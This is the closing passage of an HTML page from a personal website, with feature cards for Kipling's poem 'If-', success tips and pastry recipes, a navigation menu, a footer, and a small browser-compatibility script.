			<div class="4u 12u(narrower)">
				<section>
					<span class="icon featured fa-child"></span>
					<header>
						<h3>“If-” you'll be a Man…</h3>
					</header>
					<p>Re-discover Rudyard Kipling's famous poem “If- you'll be a Man, my son” which has inspired so many generations. It celebrates the courage to overcome hardship.</p>
					<footer>
						<ul class="buttons">
							<li><a href="en-if-you-will-be-a-man-my-son.html" class="button small">Read More</a></li>
						</ul>
					</footer>
				</section>
			</div>
			<div class="4u 12u(narrower)">
				<section>
					<span class="icon featured fa-trophy"></span>
					<header>
						<h3>I've decided to succeed</h3>
					</header>
					<p>I have put together 10 tried and tested tips for finding the will to successfully achieve your ambitions and overcome obstacles in your personal and professional life.</p>
					<footer>
						<ul class="buttons">
							<li><a href="en-change-your-life-succeed-evolve.html" class="button small">Read More</a></li>
						</ul>
					</footer>
				</section>
			</div>
			<div class="4u 12u(narrower)">
				<section>
					<span class="icon featured fa-food"></span>
					<header>
						<h3>Gourmet treats</h3>
					</header>
					<p>Exquisite recipes for mini-cakes (madeleines, financiers, biscuits, cakes, muffins) and other delicacies (croissants, brioche, traditional cakes…).</p>
					<footer>
						<ul class="buttons">
							<li><a href="en-delicacy.html" class="button small">Read More</a></li>
						</ul>
					</footer>
				</section>
			</div>
		</div>
	</section>
</article>

<!-- Menu -->
<nav id="my-menu" role="navigation">
<!--z><div id="menu" class="wrapper style3 container 75%"><h2>MENU</h2></z-->
<ul>
	<li><a href="en-index.html"><span class="icon fa-home fa-fw"></span> Home</a></li>
	<li><a href="en-if-you-will-be-a-man-my-son.html"><span class="icon fa-child fa-fw"></span> If- You'll Be a Man my Son</a></li>
	<li><a href="en-change-your-life-succeed-evolve.html"><span class="icon fa-trophy fa-fw"></span> I've Decided to Succeed</a></li>
	<li><a href="en-change-the-world-and-humanity.html"><span class="icon fa-baton-lumiere fa-fw"></span> Free Yourself from Evil</a></li>
	<li><a href="en-universal-meditation-relaxation-video.html"><span class="icon fa-cloud fa-fw"></span> Relaxation and Meditation</a></li>
	<li><a href="en-manipulation-crowd-social-opinion.html"><span class="icon fa-flag fa-fw"></span> Manipulate Opinion</a></li>
	<li class="submenu">
	<span><span class="icon fa-food fa-fw"></span> Gourmet Treats</span>
	<ul>
		<li><a href="en-mini-cake-madeleine.html"><span class="icon fa-food fa-fw"></span> Madeleines</a></li>
		<li><a href="en-mini-cake-financier.html"><span class="icon fa-food fa-fw"></span> Almond Financiers</a></li>
		<li><a href="en-mini-cake-butter-biscuits.html"><span class="icon fa-food fa-fw"></span> Butter Biscuits</a></li>
		<li><a href="en-mini-cake-british.html"><span class="icon fa-food fa-fw"></span> Mini Cakes</a></li>
		<li><a href="en-mini-cake-muffins.html"><span class="icon fa-food fa-fw"></span> Muffins</a></li>
		<li><a href="en-mini-cake-bricks.html"><span class="icon fa-food fa-fw"></span> Bricks</a></li>
		<li><a href="en-delicacy-croissants-pastry.html"><span class="icon fa-food fa-fw"></span> Croissants</a></li>
		<li><a href="en-delicacy-brioche-pastry.html"><span class="icon fa-food fa-fw"></span> Brioche</a></li>
		<li><a href="en-cake-tender-tere-couque.html"><span class="icon fa-food fa-fw"></span> Tender Cake / Tère Couque</a></li>
		<li><a href="en-delicacy-pancakes-crepes.html"><span class="icon fa-food fa-fw"></span> Pancakes</a></li>
		<li><a href="en-delicacy-caramel-salted-butter.html"><span class="icon fa-food fa-fw"></span> Caramel Salted Butter</a></li>
		<li><a href="en-delicacy-hazelnut-chocolate-spread.html"><span class="icon fa-food fa-fw"></span> Hazelnut Chocolate Spread</a></li>
		<li><a href="en-cake-amankay-apple-pie.html"><span class="icon fa-food fa-fw"></span> Amankay Apple Pie</a></li>
		<li><a href="en-cake-streusel-cream-cherry.html"><span class="icon fa-food fa-fw"></span> Streusel and Cream</a></li>
		<li><a href="en-cake-viennese-apple-strudel.html"><span class="icon fa-food fa-fw"></span> Apple Strudel</a></li>
		<li><a href="en-cake-kouglof-gugelhupf.html"><span class="icon fa-food fa-fw"></span> Kouglof</a></li>
		<li><a href="en-cake-stollen.html"><span class="icon fa-food fa-fw"></span> Stollen</a></li>
		<li><a href="en-cake-rolled.html"><span class="icon fa-food fa-fw"></span> Rolled Cake</a></li>
		<li><a href="en-cake-strawberry-pie.html"><span class="icon fa-food fa-fw"></span> Strawberry Pie</a></li>
		<li><a href="en-cake-rhubarbe.html"><span class="icon fa-food fa-fw"></span> Rhubarb Pie</a></li>
		<li><a href="en-cake-clafoutis.html"><span class="icon fa-food fa-fw"></span> Clafoutis</a></li>
		<li><a href="en-cake-universal-pie.html"><span class="icon fa-food fa-fw"></span> Universal Pie</a></li>
		<li><a href="en-cake-mirabelle-quetsche.html"><span class="icon fa-food fa-fw"></span> Mirabelle Cake</a></li>
		<li><a href="en-cake-poppy-seed.html"><span class="icon fa-food fa-fw"></span> Poppy Seed Cake</a></li>
		<li><a href="en-delicacy-rice-pudding-semolina.html"><span class="icon fa-food fa-fw"></span> Rice Pudding</a></li>
	</ul>
	</li>
	<li><a href="en-business-model-canvas-validate-idea.html"><span class="icon fa-line-chart fa-fw"></span> Business Idea Canvas</a></li>
	<li><a href="en-10-marketing-techniques-innovation.html"><span class="icon fa-shopping-cart fa-fw"></span> 10 Marketing Secrets</a></li>
	<li><a href="en-blog-of-jokes.html"><span class="icon fa-paw fa-fw"></span> Blog of Jokes</a></li>
	<li class="submenu">
	<span><span class="icon fa-code fa-fw"></span> Tools for WebDev</span>
	<ul>
		<li><a href="en-internet-secure-protect-from-hacker-attacks.html"><span class="icon fa-code fa-fw"></span> Protected from hackers</a></li>
		<li><a href="en-internet-backup-restore-files-web-sql.html"><span class="icon fa-code fa-fw"></span> Website Backup</a></li>
		<li><a href="en-internet-seo-web-site.html"><span class="icon fa-code fa-fw"></span> Website SEO</a></li>
		<li><a href="en-internet-debug-php-mysql.html"><span class="icon fa-code fa-fw"></span> Scripts Debugging</a></li>
	</ul>
	</li>
	<li><a href="en-photography-practical-tips.html"><span class="icon fa-diaph fa-fw"></span> Photographer's Tips</a></li>
	<li><a href="en-free-downloads.html"><span class="icon fa-download fa-fw"></span> Free Downloads</a></li>
	<li><a href="en-message.html"><span class="icon fa-envelope fa-fw"></span> Contact</a></li>
	<li><a href="#0" class="commutateur mode-clair" data-stylesheet="css/styles.clair.min.css"><span class="icon fa-sun fa-fw modestyle clair"></span> <span class="paramBouton">Light</span></a><a href="#0" class="commutateur mode-sombre" data-stylesheet="css/styles.sombre.min.css"><span class="icon fa-moon fa-fw modestyle sombre"></span> <span class="paramBouton">Dark</span></a> <a href="#0" id="modecaractopti"><span class="icon fa-font fa-fw modestyle sombre"></span></a></li>
</ul>
<!--z></div></z-->
</nav>

<!-- Footer -->
<footer id="footer" role="contentinfo">
	<ul class="copyright">
	<li><a href="en-index.html"><span class="icon fa-home fa-fw"></span> Home</a></li>
	<li><a href="en-message.html"><span class="icon fa-envelope fa-fw"></span> Contact</a></li>
	<li><a href="internet-se-proteger-des-pirates-et-hackers.html"><span class="icon fa-language fa-fw"></span> En Français</a></li>
	<li><a href="en-sitemap.html" accesskey="3"><span class="icon fa-align-bars fa-fw"></span> Site Map <span class="smallfont">[KEY]+3</span></a></li>
	</ul>
	<ul class="copyright">
	<li>&copy; 2007 to 2024 </li><li><a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a></li><li><span class="icon fa-code fa-fw"></span> <a href="README.html">Credits</a></li>
	</ul>
</footer>

<!--z><style>li.submenu{margin-top:1em}li.submenu ul{padding-left:.68em}#header{position:absolute}</style></z-->
</div><!-- page-wrapper -->

<!-- Scripts -->
<link rel="stylesheet" href="css/styles.min.css">
<link rel="stylesheet" id="feuillestyle-active"><link rel="stylesheet" id="feuilleStyleCaract">
<script src="js/script.min.js" async></script>
<script async>function ers(){var e=document.getElementById("page-wrapper").innerHTML.replace(/(<!--z>|<\/z-->)/g,"");document.getElementById("page-wrapper").innerHTML=e}try{eval("(class Foo{})")}catch(a){ers()}</script>

</body>
</html>